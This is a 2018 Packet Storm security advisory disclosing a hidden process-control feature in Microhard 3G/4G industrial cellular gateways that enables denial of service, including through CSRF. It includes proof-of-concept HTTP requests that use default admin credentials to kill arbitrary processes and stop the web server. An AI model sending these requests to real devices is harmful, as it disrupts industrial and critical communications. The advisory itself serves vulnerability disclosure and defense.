Microhard Systems 3G/4G Cellular Ethernet And Serial Gateway Denial Of Service

2018-07-16T00:00:00
ID PACKETSTORM:148568
Type packetstorm
Reporter LiquidWorm
Modified 2018-07-16T00:00:00

Description

                                        
                                            `  
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS  
  
  
Vendor: Microhard Systems Inc.  
Product web page: http://www.microhardcorp.com  
Affected version: IPn4G 1.1.0 build 1098  
IPn3Gb 2.2.0 build 2160  
IPn4Gb 1.1.6 build 1184-14  
IPn4Gb 1.1.0 Rev 2 build 1090-2  
IPn4Gb 1.1.0 Rev 2 build 1086  
Bullet-3G 1.2.0 Rev A build 1032  
VIP4Gb 1.1.6 build 1204  
VIP4G 1.1.6 Rev 3.0 build 1184-14  
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196  
IPn3Gii / Bullet-3G 1.2.0 build 1076  
IPn4Gii / Bullet-LTE 1.2.0 build 1078  
BulletPlus 1.3.0 build 1036  
Dragon-LTE 1.1.0 build 1036  
  
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution  
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb  
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control  
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial  
RS232/485/422 devices!  
  
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses  
the widespread deployment of cellular network infrastructure for critical data collection.  
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!  
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It  
provides robust and secure wireless communication of Serial, USB and Ethernet data.  
  
The all new Bullet-3G provides a compact, robust, feature packed industrial strength  
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things  
to the next level by providing features such as Ethernet with PoE, RS232 Serial port  
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated  
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution  
worth looking at!  
  
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength  
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote  
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight  
system integration and design flexibility with dual Ethernet Ports and high power  
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access  
Control Lists, the Dragon-LTE provides a solution for any cellular application!  
  
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE  
network infrastructure for critical data communications. The VIP4Gb provides simultaneous  
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital  
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in  
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.  
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.  
  
Desc: There is an undocumented and hidden feature that allows an authenticated attacker  
to list running processes in the operating system and send arbitrary signals to kill  
any process running in the background including starting and stopping system services.  
This impacts availability and can be triggered also by CSRF attacks that requires device  
restart and/or factory reset to rollback malicious changes.  
  
Tested on: httpd-ssl-1.0.0  
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2018-5481  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php  
  
  
13.03.2018  
  
--  
  
  
POST /cgi-bin/webif/status-processes.sh HTTP/1.1  
Host: 192.168.1.1  
Connection: keep-alive  
Content-Length: 34  
Cache-Control: max-age=0  
Authorization: Basic YWRtaW46YWRtaW4=  
Origin: http://166.130.177.150  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Referer: http://192.168.1.1/cgi-bin/webif/status-processes.sh  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: style=null  
  
signal=SIGILL&pid=1337&kill=+Send+  
  
  
===  
  
  
Available services:  
  
# ls /etc/init.d/  
boot dmesgbackup gpsgatetr ipsecfwadd mh_product quagga sysctl vlan  
checksync dnsmasq gpsr keepalive modbusd rcS systemmode vnstat  
coova-chilli done gpsrecorderd led msmscomd salertd telnet watchdog  
cron dropbear gred ledcon msshc sdpServer timezone webif  
crontab eurd httpd localmonitord network snmpd twatchdog webiffirewalllog  
custom-user-startup firewall ioports logtrigger ntpclient soip umount websockserverd  
datausemonitord force_reboot iperf lte ntrd soip2 updatedd wsClient  
defconfig ftpd ipsec lteshutdown nxl2tpd-wan soip2.getty usb xl2tpd  
dhcp_client gpsd ipsec_vpn media_ctrl pimd soipd1 vcad xl2tpd-wan  
  
  
Stop the HTTPd:  
  
GET http://192.168.1.1/cgi-bin/webif/system-services.sh?service=httpd&action=stop HTTP/1.1  
`